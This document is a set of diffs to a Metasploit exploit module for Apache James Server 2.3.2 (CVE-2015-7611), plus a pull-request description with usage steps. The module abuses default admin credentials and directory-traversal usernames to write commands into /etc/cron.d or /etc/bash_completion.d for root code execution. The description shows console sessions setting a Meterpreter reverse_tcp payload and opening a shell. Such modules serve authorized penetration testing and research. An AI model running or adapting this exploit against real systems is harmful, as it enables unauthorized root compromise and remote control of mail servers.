+    sock.puts(cmd)
     sock.get_once
     sock.puts("quit\n")
     disconnect
+  end
+
+  def cron_cleanup()
+    # Delete mail objects containing payload from cron.d
+    username = "../../../../../../../../etc/cron.d"
+    password = "exploit"
+    begin
+      connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=> "110" })
+      sock.get_once
+      sock.puts("USER #{username}\r\n")
+      sock.get_once
+      sock.puts("PASS #{password}\r\n")
+      sock.get_once
+      sock.puts("dele 1\r\n")
+      sock.get_once
+      sock.puts("quit\r\n")
+      disconnect
+    rescue
+      print_bad("Failed to remove payload artifacts from /etc/cron.d")
+    end
+
+    # Delete malicious user
+    delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"
+    execute_james_admin_tool_command(delete_user_command)
+  end
+
+  def execute_command(cmd, opts = {})
+    # Create malicious user (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
+    exploit_path = target['ExploitPath']
+    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} exploit\n"
+    execute_james_admin_tool_command(add_user_command)
 
     # Send payload via SMTP
+    payload_prepend = target['ExploitPrepend']
     connect
     sock.puts("ehlo admin@apache.com\r\n")
     sock.get_once
     sock.puts("mail from: <'@apache.com>\r\n")
     sock.get_once
-    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
+    sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")
     sock.get_once
     sock.puts("data\r\n")
     sock.get_once
     sock.puts("From: admin@apache.com\r\n")
     sock.puts("\r\n")
     sock.puts("'\n")
-    sock.puts("#{cmd}\n")
+    sock.puts("#{payload_prepend}#{cmd}\n")
     sock.puts("\r\n.\r\n")
     sock.get_once
     sock.puts("quit\r\n")
     sock.get_once
     disconnect
+    if exploit_path == "cron.d"
+      print_status("Waiting 60 seconds for cron to execute payload")
+      sleep(60)
+    end
   end
 
   def exploit
     execute_cmdstager
+    if target['ExploitPath'] == "cron.d"
+      cron_cleanup()
+    end
   end
 
 end

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -65,6 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
           OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
           OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
+          OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
           Opt::RPORT(25)
         ])
   end
@@ -121,12 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
   end
 
-  def cron_cleanup()
+  def cron_cleanup
     # Delete mail objects containing payload from cron.d
     username = "../../../../../../../../etc/cron.d"
     password = "exploit"
     begin
-      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => "110"})
+      connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
       sock.get_once
       sock.puts("USER #{username}\r\n")
       sock.get_once
@@ -180,7 +181,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     execute_cmdstager
     if target['ExploitPath'] == "cron.d"
-      cron_cleanup()
+      cron_cleanup
+    else
+      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' to fully clean up exploit artifacts.")
     end
   end
 

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -50,10 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         [ 'Bash Completion', {
           'ExploitPath' => 'bash_completion.d',
-          'ExploitPrepend' => '' } ],
+          'ExploitPrepend' => '',
+          'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
+        } ],
         [ 'Cron', {
           'ExploitPath' => 'cron.d',
-          'ExploitPrepend' => '* * * * * root ' } ]
+          'ExploitPrepend' => '* * * * * root ',
+          'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
+        } ]
       ],
       'Privileged'     => true,
       'DisclosureDate' => "Oct 1 2015",
@@ -68,6 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
           Opt::RPORT(25)
         ])
+    import_target_defaults
   end
 
   def check
@@ -122,7 +127,8 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
   end
 
-  def cron_cleanup
+  def cleanup
+    return unless target['ExploitPath'] == "cron.d"
     # Delete mail objects containing payload from cron.d
     username = "../../../../../../../../etc/cron.d"
     password = @account_password
@@ -173,19 +179,20 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.puts("quit\r\n")
     sock.get_once
     disconnect
-    if exploit_path == "cron.d"
-      print_status("Waiting 60 seconds for cron to execute payload")
-      sleep(60)
+  end
+
+  def execute_cmdstager_end(opts)
+    if target['ExploitPath'] == "cron.d"
+      print_status("Waiting for cron to execute payload...")
+    else
+      print_status("Payload will be triggered when someone logs onto the target")
+      print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
+      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
     end
   end
 
   def exploit
-    execute_cmdstager
-    if target['ExploitPath'] == "cron.d"
-      cron_cleanup
-    else
-      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
-    end
+    execute_cmdstager(background: true)
   end
 
 end

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Apache James Server 2.3.2 Insecure User Arbitrary File Write",
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
       'Description'    => %q{
         To use this module, start a listener using the given payload, host, and
         port before running the exploit. After running the exploit, the payload

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -1,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
+      'Description'    => %q{
+        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7611'],
+          [ 'EDB', '35513'],
+          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'=> [ 'printf' ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+        ])
+      deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  def check
+    connect
+    banner = sock.get
+    if banner.include? "(JAMES SMTP Server 2.3.2)"
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+
+    sock.get
+
+    sock.puts(username + "\n")
+    sock.get
+
+    sock.puts(password + "\n")
+    sock.get
+
+    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
+    sock.get
+
+    sock.puts("quit\n")
+    disconnect
+
+    connect
+
+    sock.puts("ehlo admin@apache.com\r\n")
+    sock.get
+
+    sock.puts("mail from: <'@apache.com>\r\n")
+    sock.get
+
+    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
+    sock.get
+
+    sock.puts("data\r\n")
+    sock.get
+
+    sock.puts("From: admin@apache.com\r\n")
+    sock.puts("\r\n")
+    sock.puts("'\n")
+    sock.puts("#{cmd}\n")
+    sock.puts("\r\n.\r\n")
+    sock.get
+
+    sock.puts("quit\r\n")
+    sock.get
+
+    disconnect
+  end
+
+  def exploit
+    execute_cmdstager
+  end
+
+end

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         partially defined by the username. By creating a user with a directory
         traversal payload as the username, commands can be written to a given
         directory. For this exploit, bash completion must be enabled to
-        gain code execution. This exploit will leave an Apache James mail
-        object artifact in the /etc/bash_completion.d directory and the
+        gain code execution. This exploit will leave 2 Apache James mail
+        object artifacts in the /etc/bash_completion.d directory and the
         malicious user account.
       },
       'License'        => MSF_LICENSE,
@@ -64,19 +64,39 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # Grab banner for SMTP service
+    # SMTP service check
     connect
     smtp_banner = sock.get_once
     disconnect
-    # Grab banner for James Remote Administration tool
+    unless smtp_banner =~ /JAMES SMTP Server/
+      return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
+    end
+
+    # James Remote Administration Tool service check
     connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
     admin_banner = sock.get_once
     disconnect
-    # Check that both SMTP and admin tool are accessable and vulnerable
-    if smtp_banner.include? "(JAMES SMTP Server 2.3.2)" and admin_banner.include? "JAMES Remote Administration Tool 2.3.2"
-      return Exploit::CheckCode::Appears
-    else
-      return Exploit::CheckCode::Unknown
+    unless admin_banner =~ /JAMES Remote Administration Tool/
+      return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
+    end
+
+    # Get version number
+    version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
+    # Null check
+    unless version
+      return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
+    end
+    # Create version objects
+    target_version = Gem::Version.new(version)
+    vulnerable_version = Gem::Version.new("2.3.2")
+
+    # Check version number
+    if target_version > vulnerable_version
+      return CheckCode::Safe
+    elsif target_version == vulnerable_version
+      return CheckCode::Appears
+    elsif target_version < vulnerable_version
+      return CheckCode::Detected("However,version #{version} of JAMES Remote Administration Tool may still be vulnerable")
     end
   end
 

--- a/modules/exploits/linux/smtp/apache_james_exec.rb
+++ b/modules/exploits/linux/smtp/apache_james_exec.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def cron_cleanup
     # Delete mail objects containing payload from cron.d
     username = "../../../../../../../../etc/cron.d"
-    password = "exploit"
+    password = @account_password
     begin
       connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
       sock.get_once
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.puts("quit\r\n")
       disconnect
     rescue
-      print_bad("Failed to remove payload artifacts from /etc/cron.d")
+      print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")
     end
 
     # Delete malicious user
@@ -147,9 +147,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    # Create malicious user (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
+    # Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
     exploit_path = target['ExploitPath']
-    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} exploit\n"
+    @account_password = Rex::Text.rand_text_alpha(8..12)
+    add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"
     execute_james_admin_tool_command(add_user_command)
 
     # Send payload via SMTP
@@ -183,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['ExploitPath'] == "cron.d"
       cron_cleanup
     else
-      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password 'exploit' to fully clean up exploit artifacts.")
+      print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
     end
   end
 


### PR DESCRIPTION
## Vulnerable Application
  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
  Instructions for installing the vulnerable application for testing can be found here:
  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

## Verification Steps
  __1.__ Start msfconsole

  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec

  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport

  __4.__ DO: Set the preferred payload

  __5.__ DO: Run the check method to determine vulnerability

  __6.__ DO: Run the exploit

  __7.__ The payload will connect to the listener if the exploit is successful

## Options
  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
  **RHOSTS:**  The IP address of the vulnerable server.
  **RPORT:**  The port number of the SMTP service.
  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.

## Scenarios
  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
  mail objects.

  __1.__ Load the module:
```
  msf5 > use exploit/linux/smtp/apache_james_exec
```

  __2.__ Set remote and local options:
```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
  target => 1
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
  rhosts =>  192.168.224.169

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444
```

  __3.__ Set payload:
```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
```

  __4.__ Check version and run exploit:
```
  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.224.167:4444
  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
  [*] Sending stage (3021284 bytes) to 192.168.224.169
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)

  meterpreter >
```

  ---------------------------------------------------------------------------------------------
  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
  /etc/bash_completion.d directory and the malicious user account.

  __1.__ Load the module:
```
  msf5 > use exploit/linux/smtp/apache_james_exec
```

  __2.__ Set remote and local options:
```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
  target => 0
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
  rhosts => 192.168.224.164

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444
```

  __3.__ Set payload:
```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
```

  __4.__ Check version and run exploit:
```
  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
```

  __5.__ Set up and run listener (Can be done before running exploit):
```
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lport 4444
  lport => 4444
  msf5 exploit(multi/handler) > set lhost 192.168.224.167
  lhost => 192.168.224.167

  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.224.167:4444
  [*] Sending stage (3021284 bytes) to 192.168.224.164
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800

  meterpreter >
```

## Targets
```
  Id  Name 
  --  ----
  0   Bash Completion
  1   Cron
```

## References
  1. <https://www.exploit-db.com/exploits/35513>
  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>